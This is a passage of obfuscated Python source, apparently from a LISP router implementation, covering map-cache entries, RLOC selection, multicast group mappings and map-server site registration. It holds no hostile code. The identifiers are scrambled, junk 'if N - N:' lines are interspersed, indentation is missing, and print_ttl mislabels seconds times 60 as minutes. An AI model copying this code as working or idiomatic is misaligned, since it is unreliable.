if 37 - 37: oO0o / o0oOOo0O0Ooo + I11i * OoO0O00 * o0oOOo0O0Ooo
def print_mapping ( self , eid_indent , rloc_indent ) :
i1 = lisp_print_elapsed ( self . uptime )
oo0oOooo0O = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 33 - 33: I1Ii111
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , oo0oOooo0O , i1 ,
len ( self . rloc_set ) ) )
for iIIiI11 in self . rloc_set : iIIiI11 . print_rloc ( rloc_indent )
if 97 - 97: Ii1I / iII111i - ooOoO0o + IiII * OoOoOO00 - OOooOOo
if 43 - 43: oO0o / II111iiii - iII111i / oO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 98 - 98: OoOoOO00 / OOooOOo
if 31 - 31: II111iiii % I11i - I11i
def print_ttl ( self ) :
O0O00O = self . map_cache_ttl
if ( O0O00O == None ) : return ( "forever" )
if 17 - 17: iII111i . IiII + OOooOOo % I1Ii111 % i11iIiiIii
if ( O0O00O >= 3600 ) :
if ( ( O0O00O % 3600 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 3600 ) ) + " hours"
else :
O0O00O = str ( O0O00O * 60 ) + " mins"
if 100 - 100: i11iIiiIii - O0 . OoO0O00 / O0 - Ii1I - IiII
elif ( O0O00O >= 60 ) :
if ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " mins"
else :
O0O00O = str ( O0O00O ) + " secs"
if 72 - 72: Ii1I % O0 + II111iiii . i11iIiiIii
else :
O0O00O = str ( O0O00O ) + " secs"
if 66 - 66: II111iiii % I1IiiI
return ( O0O00O )
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 + I1Ii111 * OOooOOo . I1IiiI
if 96 - 96: I1ii11iIi11i
def refresh ( self ) :
if ( self . group . is_null ( ) ) : return ( self . refresh_unicast ( ) )
return ( self . refresh_multicast ( ) )
if 37 - 37: OoO0O00 % o0oOOo0O0Ooo * O0 * O0 + iII111i
if 18 - 18: i11iIiiIii . o0oOOo0O0Ooo - OOooOOo % oO0o * Ii1I / I1IiiI
def refresh_unicast ( self ) :
return ( self . is_active ( ) and self . has_ttl_elapsed ( ) and
self . gleaned == False )
if 46 - 46: o0oOOo0O0Ooo . ooOoO0o / Ii1I
if 97 - 97: Ii1I . Oo0Ooo - O0 - I1Ii111 . i1IIi
def refresh_multicast ( self ) :
if 47 - 47: IiII * ooOoO0o - i1IIi % OoOoOO00 * i11iIiiIii . OoooooooOO
if 84 - 84: OoOoOO00 / IiII - i1IIi - I1IiiI * OOooOOo
if 35 - 35: II111iiii
if 28 - 28: I1Ii111 + IiII + I1ii11iIi11i . Ii1I
if 82 - 82: ooOoO0o - ooOoO0o . Ii1I . i11iIiiIii % Ii1I + OOooOOo
i1i111Iiiiiii = int ( ( time . time ( ) - self . uptime ) % self . map_cache_ttl )
IIiI1I1i = ( i1i111Iiiiiii in [ 0 , 1 , 2 ] )
if ( IIiI1I1i == False ) : return ( False )
if 37 - 37: OoO0O00 * OoO0O00 % iIii1I11I1II1 % II111iiii + Oo0Ooo
if 4 - 4: i11iIiiIii + OoOoOO00 - Ii1I * i1IIi * i11iIiiIii
if 46 - 46: IiII . iII111i % OoooooooOO % IiII + Ii1I - OoooooooOO
if 23 - 23: O0 - iII111i
IiIiI1I1Ii = ( ( time . time ( ) - self . last_multicast_map_request ) <= 2 )
if ( IiIiI1I1Ii ) : return ( False )
if 51 - 51: i1IIi % oO0o . iII111i % i1IIi
self . last_multicast_map_request = lisp_get_timestamp ( )
return ( True )
if 74 - 74: O0 / ooOoO0o - OOooOOo / OoO0O00 % I11i * II111iiii
if 42 - 42: I1IiiI * Ii1I
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
i1i111Iiiiiii = time . time ( ) - self . last_refresh_time
if ( i1i111Iiiiiii >= self . map_cache_ttl ) : return ( True )
if 95 - 95: OoO0O00 * i1IIi
if 43 - 43: Oo0Ooo % iII111i % O0 + i1IIi
if 45 - 45: ooOoO0o
if 89 - 89: iIii1I11I1II1 . I1Ii111
if 43 - 43: Oo0Ooo + o0oOOo0O0Ooo % o0oOOo0O0Ooo % I1ii11iIi11i / iIii1I11I1II1 . I1ii11iIi11i
O0ooo = self . map_cache_ttl - ( old_div ( self . map_cache_ttl , 10 ) )
if ( i1i111Iiiiiii >= O0ooo ) : return ( True )
return ( False )
if 33 - 33: Ii1I
if 95 - 95: OoooooooOO + OoO0O00 * ooOoO0o
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
i1i111Iiiiiii = time . time ( ) - self . stats . last_increment
return ( i1i111Iiiiiii <= 60 )
if 40 - 40: I1IiiI / OOooOOo * Ii1I
if 98 - 98: I1IiiI
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 4 - 4: I1IiiI % O0 / Oo0Ooo / O0
if 90 - 90: ooOoO0o - O0 . IiII - O0 . iIii1I11I1II1
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 42 - 42: I1ii11iIi11i
if 51 - 51: iII111i % i11iIiiIii . OoO0O00 . IiII - OoOoOO00 * i1IIi
def delete_rlocs_from_rloc_probe_list ( self ) :
for iIIiI11 in self . best_rloc_set :
iIIiI11 . delete_from_rloc_probe_list ( self . eid , self . group )
if 14 - 14: I1ii11iIi11i . OoO0O00
if 26 - 26: iII111i / ooOoO0o / Oo0Ooo / Oo0Ooo . I1ii11iIi11i * OOooOOo
if 25 - 25: IiII % I1IiiI / O0 % OOooOOo - OoooooooOO
def build_best_rloc_set ( self ) :
ii1i111 = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 58 - 58: Ii1I * oO0o . I1ii11iIi11i % I1IiiI - ooOoO0o
if 100 - 100: i11iIiiIii / O0 . Oo0Ooo + i1IIi . OoOoOO00
if 76 - 76: OoooooooOO - O0
if 17 - 17: Oo0Ooo % I1Ii111 . oO0o - O0
iiiIIi1Iii = 256
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . up_state ( ) ) : iiiIIi1Iii = min ( iIIiI11 . priority , iiiIIi1Iii )
if 39 - 39: iII111i - I1ii11iIi11i % ooOoO0o - OoOoOO00 + OoOoOO00
if 97 - 97: I11i * I1Ii111 * oO0o
if 3 - 3: iIii1I11I1II1 / ooOoO0o + ooOoO0o + I11i
if 20 - 20: OOooOOo - i1IIi / i11iIiiIii
if 60 - 60: I11i * I11i + Oo0Ooo . IiII / iII111i % OoooooooOO
if 35 - 35: O0 . Oo0Ooo / Oo0Ooo / Ii1I / i1IIi * I11i
if 93 - 93: O0 + IiII
if 91 - 91: iIii1I11I1II1
if 66 - 66: i1IIi . ooOoO0o
if 84 - 84: O0 % ooOoO0o / I1Ii111
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . priority <= iiiIIi1Iii ) :
if ( iIIiI11 . unreach_state ( ) and iIIiI11 . last_rloc_probe == None ) :
iIIiI11 . last_rloc_probe = lisp_get_timestamp ( )
if 75 - 75: I11i - iII111i . O0
self . best_rloc_set . append ( iIIiI11 )
if 52 - 52: I1ii11iIi11i
if 22 - 22: I1ii11iIi11i - i1IIi / OOooOOo . o0oOOo0O0Ooo . oO0o
if 9 - 9: ooOoO0o - I1Ii111 + IiII . iII111i
if 52 - 52: I1Ii111 + oO0o % II111iiii - i1IIi
if 32 - 32: I1Ii111 % ooOoO0o + I1Ii111 / I1ii11iIi11i - o0oOOo0O0Ooo + ooOoO0o
if 46 - 46: OoO0O00 % OoO0O00 . O0 + II111iiii
if 42 - 42: OOooOOo * I1Ii111
if 53 - 53: II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % I1ii11iIi11i * iII111i
for iIIiI11 in ii1i111 :
if ( iIIiI11 . priority < iiiIIi1Iii ) : continue
iIIiI11 . delete_from_rloc_probe_list ( self . eid , self . group )
if 91 - 91: iII111i . OoooooooOO
for iIIiI11 in self . best_rloc_set :
if ( iIIiI11 . rloc . is_null ( ) ) : continue
iIIiI11 . add_to_rloc_probe_list ( self . eid , self . group )
if 90 - 90: i11iIiiIii - I1IiiI
if 39 - 39: iII111i % OoooooooOO % Ii1I % I1IiiI
if 63 - 63: OoO0O00 - I1Ii111 - II111iiii
def select_rloc ( self , lisp_packet , ipc_socket ) :
Oo00oo = lisp_packet . packet
OoOooO00 = lisp_packet . inner_version
i1iIii = len ( self . best_rloc_set )
if ( i1iIii == 0 ) :
self . stats . increment ( len ( Oo00oo ) )
return ( [ None , None , None , self . action , None , None ] )
if 66 - 66: i1IIi + I1IiiI
if 45 - 45: I1Ii111 . iII111i + OoO0O00 - O0
oO00o00oo = 4 if lisp_load_split_pings else 0
II1Iii1iI = lisp_packet . hash_ports ( )
if ( OoOooO00 == 4 ) :
for iIi1iIIIiIiI in range ( 8 + oO00o00oo ) :
II1Iii1iI = II1Iii1iI ^ struct . unpack ( "B" , Oo00oo [ iIi1iIIIiIiI + 12 : iIi1iIIIiIiI + 13 ] ) [ 0 ]
if 12 - 12: OoooooooOO . OOooOOo
elif ( OoOooO00 == 6 ) :
for iIi1iIIIiIiI in range ( 0 , 32 + oO00o00oo , 4 ) :
II1Iii1iI = II1Iii1iI ^ struct . unpack ( "I" , Oo00oo [ iIi1iIIIiIiI + 8 : iIi1iIIIiIiI + 12 ] ) [ 0 ]
if 83 - 83: I1ii11iIi11i * I1Ii111 . o0oOOo0O0Ooo
II1Iii1iI = ( II1Iii1iI >> 16 ) + ( II1Iii1iI & 0xffff )
II1Iii1iI = ( II1Iii1iI >> 8 ) + ( II1Iii1iI & 0xff )
else :
for iIi1iIIIiIiI in range ( 0 , 12 + oO00o00oo , 4 ) :
II1Iii1iI = II1Iii1iI ^ struct . unpack ( "I" , Oo00oo [ iIi1iIIIiIiI : iIi1iIIIiIiI + 4 ] ) [ 0 ]
if 86 - 86: I1ii11iIi11i * iII111i
if 37 - 37: i1IIi / I11i . iII111i - II111iiii
if 66 - 66: Ii1I + OoOoOO00 - I11i / o0oOOo0O0Ooo + iIii1I11I1II1
if ( lisp_data_plane_logging ) :
O0O0OO0o0 = [ ]
for iiiI1I in self . best_rloc_set :
if ( iiiI1I . rloc . is_null ( ) ) : continue
O0O0OO0o0 . append ( [ iiiI1I . rloc . print_address_no_iid ( ) , iiiI1I . print_state ( ) ] )
if 23 - 23: IiII - OoOoOO00 . OoO0O00
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( II1Iii1iI ) , II1Iii1iI % i1iIii , red ( str ( O0O0OO0o0 ) , False ) ) )
if 81 - 81: I1Ii111 / I1ii11iIi11i
if 69 - 69: I1IiiI
if 79 - 79: ooOoO0o
if 83 - 83: I1Ii111 % II111iiii
if 89 - 89: Ii1I . I11i
if 98 - 98: I1Ii111 / O0 % ooOoO0o
iIIiI11 = self . best_rloc_set [ II1Iii1iI % i1iIii ]
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
if 88 - 88: i1IIi . I1IiiI
if 8 - 8: I1ii11iIi11i . OoO0O00 % o0oOOo0O0Ooo / O0
I111Ii1I1I1iI = lisp_get_echo_nonce ( iIIiI11 . rloc , None )
if ( I111Ii1I1I1iI ) :
I111Ii1I1I1iI . change_state ( iIIiI11 )
if ( iIIiI11 . no_echoed_nonce_state ( ) ) :
I111Ii1I1I1iI . request_nonce_sent = None
if ( iIIiI11 . up_state ( ) == False ) :
OooOooo = II1Iii1iI % i1iIii
OOOooo0OooOoO = ( OooOooo + 1 ) % i1iIii
while ( OOOooo0OooOoO != OooOooo ) :
iIIiI11 = self . best_rloc_set [ OOOooo0OooOoO ]
if ( iIIiI11 . up_state ( ) ) : break
OOOooo0OooOoO = ( OOOooo0OooOoO + 1 ) % i1iIii
if ( OOOooo0OooOoO == OooOooo ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
iIIiI11 . stats . increment ( len ( Oo00oo ) )
if ( iIIiI11 . rle_name and iIIiI11 . rle == None ) :
if ( iIIiI11 . rle_name in lisp_rle_list ) :
iIIiI11 . rle = lisp_rle_list [ iIIiI11 . rle_name ]
if ( iIIiI11 . rle ) : return ( [ None , None , None , None , iIIiI11 . rle , None ] )
if ( iIIiI11 . elp and iIIiI11 . elp . use_elp_node ) :
return ( [ iIIiI11 . elp . use_elp_node . address , None , None , None , None ,
None ] )
Ii1IIIIi = None if ( iIIiI11 . rloc . is_null ( ) ) else iIIiI11 . rloc
ooO0 = iIIiI11 . translated_port
oOoO0OooO0O = self . action if ( Ii1IIIIi == None ) else None
o0Oo0o = None
if ( I111Ii1I1I1iI and I111Ii1I1I1iI . request_nonce_timeout ( ) == False ) :
o0Oo0o = I111Ii1I1I1iI . get_request_or_echo_nonce ( ipc_socket , Ii1IIIIi )
return ( [ Ii1IIIIi , ooO0 , o0Oo0o , oOoO0OooO0O , None , iIIiI11 ] )
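#
# do_rloc_sets_match() returns True when every stored RLOC has an exact
# match in the supplied rloc_address_set. The inner loop clears its
# loop variable on a match, so exiting with the last element still
# bound means no match was found for that stored RLOC.
#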
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
for OOOoOoo in self . rloc_set :
for iIIiI11 in rloc_address_set :
if ( iIIiI11 . is_exact_match ( OOOoOoo . rloc ) == False ) : continue
iIIiI11 = None
break
if ( iIIiI11 == rloc_address_set [ - 1 ] ) : return ( False )
return ( True )
def get_rloc ( self , rloc ) :
for OOOoOoo in self . rloc_set :
iiiI1I = OOOoOoo . rloc
if ( rloc . is_exact_match ( iiiI1I ) ) : return ( OOOoOoo )
return ( None )
def get_rloc_by_interface ( self , interface ) :
for OOOoOoo in self . rloc_set :
if ( OOOoOoo . interface == interface ) : return ( OOOoOoo )
return ( None )
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
OoO0oO = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( OoO0oO == None ) :
OoO0oO = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , OoO0oO )
OoO0oO . add_source_entry ( self )
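#
# add_cache() inserts this entry into the map-cache. Unicast EIDs are
# keyed directly; for (S,G) entries a group entry is created (or found)
# first and this entry is added to its per-source cache. An IPC message
# is written when do_ipc is True.
#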
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
I11iiI1III = lisp_map_cache . lookup_cache ( self . group , True )
if ( I11iiI1III == None ) :
I11iiI1III = lisp_mapping ( self . group , self . group , [ ] )
I11iiI1III . eid . copy_address ( self . group )
I11iiI1III . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , I11iiI1III )
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( I11iiI1III . group )
I11iiI1III . add_source_entry ( self )
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
Oo0OoOI1I11iII1I1i = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( Oo0OoOI1I11iII1I1i ) )
else :
I11iiI1III = lisp_map_cache . lookup_cache ( self . group , True )
if ( I11iiI1III == None ) : return
O0Ooo0 = I11iiI1III . lookup_source_cache ( self . eid , True )
if ( O0Ooo0 == None ) : return
I11iiI1III . source_cache . delete_cache ( self . eid )
if ( I11iiI1III . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
oooo = "," + str ( self . secondary_iid )
return ( prefix . replace ( oooo , oooo + "*" ) )
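#
# increment_decap_stats() charges a decapsulated packet to an RLOC.
# For the well-known data port the RLOC is found by outer destination
# address; otherwise the first RLOC with a translated (likely NATed)
# port is charged, along with the per-entry counters.
#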
def increment_decap_stats ( self , packet ) :
ooO0 = packet . udp_dport
if ( ooO0 == LISP_DATA_PORT ) :
iIIiI11 = self . get_rloc ( packet . outer_dest )
else :
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . translated_port != 0 ) : break
if ( iIIiI11 != None ) : iIIiI11 . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
def rtrs_in_rloc_set ( self ) :
for iIIiI11 in self . rloc_set :
if ( iIIiI11 . is_rtr ( ) ) : return ( True )
return ( False )
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
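#
# A dynamically discovered EID heard on an interface, with the
# discovery timestamp, last packet, and a per-interface timeout.
#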
class lisp_dynamic_eid ( object ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
def get_timeout ( self , interface ) :
try :
IiIII1i1IiI = lisp_myinterfaces [ interface ]
self . timeout = IiIII1i1IiI . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
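#
# A configured multicast group mapping: group prefix, the map-server
# name used for registering, allowed sources, and an optional RLE
# address.
#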
class lisp_group_mapping ( object ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
def lisp_is_group_more_specific ( group_str , group_mapping ) :
oooo = group_mapping . group_prefix . instance_id
OOOoOo0o0Ooo = group_mapping . group_prefix . mask_len
oo0oOooo0O = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , oooo )
if ( oo0oOooo0O . is_more_specific ( group_mapping . group_prefix ) ) : return ( OOOoOo0o0Ooo )
return ( - 1 )
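#
# lisp_lookup_group() does a longest-match lookup of a group address
# across all configured group mappings and returns the most specific
# entry, or None.
#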
def lisp_lookup_group ( group ) :
O0O0OO0o0 = None
for I1I11I1IIi in list ( lisp_group_mapping_list . values ( ) ) :
OOOoOo0o0Ooo = lisp_is_group_more_specific ( group , I1I11I1IIi )
if ( OOOoOo0o0Ooo == - 1 ) : continue
if ( O0O0OO0o0 == None or OOOoOo0o0Ooo > O0O0OO0o0 . group_prefix . mask_len ) : O0O0OO0o0 = I1I11I1IIi
return ( O0O0OO0o0 )
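#
# Legend for the Map-Register flag characters printed by
# lisp_site_eid.print_flags(); upper-case means the flag is set.
#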
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site ( object ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
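#
# Per EID-prefix registration state kept by a map-server: who last
# registered, the merged RLOC set, the flags requested by the ETR, and
# any more-specific registrations nested under this entry.
#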
class lisp_site_eid ( object ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
self . encrypt_json = False
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
def print_flags ( self , html ) :
if ( html == False ) :
oOo0OOoooO = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
OO0oOooo = self . print_flags ( False )
OO0oOooo = OO0oOooo . split ( "-" )
oOo0OOoooO = ""
for I11IIo0oOooO0O in OO0oOooo :
iiiIIi1 = lisp_site_flags [ I11IIo0oOooO0O . upper ( ) ]
iiiIIi1 = iiiIIi1 . format ( "" if I11IIo0oOooO0O . isupper ( ) else "not " )
oOo0OOoooO += lisp_span ( I11IIo0oOooO0O , iiiIIi1 )
if ( I11IIo0oOooO0O . lower ( ) != "n" ) : oOo0OOoooO += "-"
return ( oOo0OOoooO )
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
def build_sort_key ( self ) :
I111i1iI = lisp_cache ( )
iiii11I1 , III = I111i1iI . build_key ( self . eid )
OOo00OO = ""
if ( self . group . is_null ( ) == False ) :
Oo0O0O , OOo00OO = I111i1iI . build_key ( self . group )
OOo00OO = "-" + OOo00OO [ 0 : 12 ] + "-" + str ( Oo0O0O ) + "-" + OOo00OO [ 12 : : ]
III = III [ 0 : 12 ] + "-" + str ( iiii11I1 ) + "-" + III [ 12 : : ] + OOo00OO
del ( I111i1iI )
return ( III )
def merge_in_site_eid ( self , child ) :
IIII1II1 = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
IIII1II1 = self . merge_rles_in_site_eid ( )
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
return ( IIII1II1 )
def copy_rloc_records ( self ) :
IIiiiIiI = [ ]
for OOOoOoo in self . registered_rlocs :
IIiiiIiI . append ( copy . deepcopy ( OOOoOoo ) )
return ( IIiiiIiI )
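#
# merge_rlocs_in_site_eid() rebuilds the merged RLOC set from every
# individual registration that shares this site-id, then removes
# duplicate RLOC addresses from the merged list.
#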
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for i1iI11i in list ( self . individual_registrations . values ( ) ) :
if ( self . site_id != i1iI11i . site_id ) : continue
if ( i1iI11i . registered == False ) : continue
self . registered_rlocs += i1iI11i . copy_rloc_records ( )
IIiiiIiI = [ ]
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rloc . is_null ( ) or len ( IIiiiIiI ) == 0 ) :
IIiiiIiI . append ( OOOoOoo )
continue
for OOiIII1 in IIiiiIiI :
if ( OOiIII1 . rloc . is_null ( ) ) : continue
if ( OOOoOoo . rloc . is_exact_match ( OOiIII1 . rloc ) ) : break
if ( OOiIII1 == IIiiiIiI [ - 1 ] ) : IIiiiIiI . append ( OOOoOoo )
self . registered_rlocs = IIiiiIiI
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
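#
# merge_rles_in_site_eid() merges the RLEs from individual
# registrations into a single RLE on the first merged RLOC record.
# Returns True when the set of RLE node addresses actually changed.
#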
def merge_rles_in_site_eid ( self ) :
I1oo00O0 = { }
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rle == None ) : continue
for iIIi in OOOoOoo . rle . rle_nodes :
IiI = iIIi . address . print_address_no_iid ( )
I1oo00O0 [ IiI ] = iIIi . address
break
self . merge_rlocs_in_site_eid ( )
oo0OOo0Oo = [ ]
for OOOoOoo in self . registered_rlocs :
if ( self . registered_rlocs . index ( OOOoOoo ) == 0 ) :
oo0OOo0Oo . append ( OOOoOoo )
continue
if ( OOOoOoo . rle == None ) : oo0OOo0Oo . append ( OOOoOoo )
self . registered_rlocs = oo0OOo0Oo
ooo0o0O = lisp_rle ( "" )
iIi1i1I = { }
oOo = None
for i1iI11i in list ( self . individual_registrations . values ( ) ) :
if ( i1iI11i . registered == False ) : continue
iiI11Ii11iiI = i1iI11i . registered_rlocs [ 0 ] . rle
if ( iiI11Ii11iiI == None ) : continue
oOo = i1iI11i . registered_rlocs [ 0 ] . rloc_name
for oOo0o0 in iiI11Ii11iiI . rle_nodes :
IiI = oOo0o0 . address . print_address_no_iid ( )
if ( IiI in iIi1i1I ) : break
iIIi = lisp_rle_node ( )
iIIi . address . copy_address ( oOo0o0 . address )
iIIi . level = oOo0o0 . level
iIIi . rloc_name = oOo
ooo0o0O . rle_nodes . append ( iIIi )
iIi1i1I [ IiI ] = oOo0o0 . address
if ( len ( ooo0o0O . rle_nodes ) == 0 ) : ooo0o0O = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = ooo0o0O
if ( oOo ) : self . registered_rlocs [ 0 ] . rloc_name = None
if ( list ( I1oo00O0 . keys ( ) ) == list ( iIi1i1I . keys ( ) ) ) : return ( False )
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
list ( I1oo00O0 . keys ( ) ) , list ( iIi1i1I . keys ( ) ) ) )
return ( True )
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
ooOO00o = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( ooOO00o == None ) :
ooOO00o = lisp_site_eid ( self . site )
ooOO00o . eid . copy_address ( self . group )
ooOO00o . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , ooOO00o )
ooOO00o . parent_for_more_specifics = self . parent_for_more_specifics
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( ooOO00o . group )
ooOO00o . add_source_entry ( self )
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
ooOO00o = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( ooOO00o == None ) : return
i1iI11i = ooOO00o . lookup_source_cache ( self . eid , True )
if ( i1iI11i == None ) : return
if ( ooOO00o . source_cache == None ) : return
ooOO00o . source_cache . delete_cache ( self . eid )
if ( ooOO00o . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
def inherit_from_ams_parent ( self ) :
O0oOoO00O = self . parent_for_more_specifics
if ( O0oOoO00O == None ) : return
self . force_proxy_reply = O0oOoO00O . force_proxy_reply
self . force_nat_proxy_reply = O0oOoO00O . force_nat_proxy_reply
self . force_ttl = O0oOoO00O . force_ttl
self . pitr_proxy_reply_drop = O0oOoO00O . pitr_proxy_reply_drop
self . proxy_reply_action = O0oOoO00O . proxy_reply_action
self . echo_nonce_capable = O0oOoO00O . echo_nonce_capable
self . policy = O0oOoO00O . policy
self . require_signature = O0oOoO00O . require_signature
self . encrypt_json = O0oOoO00O . encrypt_json
def rtrs_in_rloc_set ( self ) :
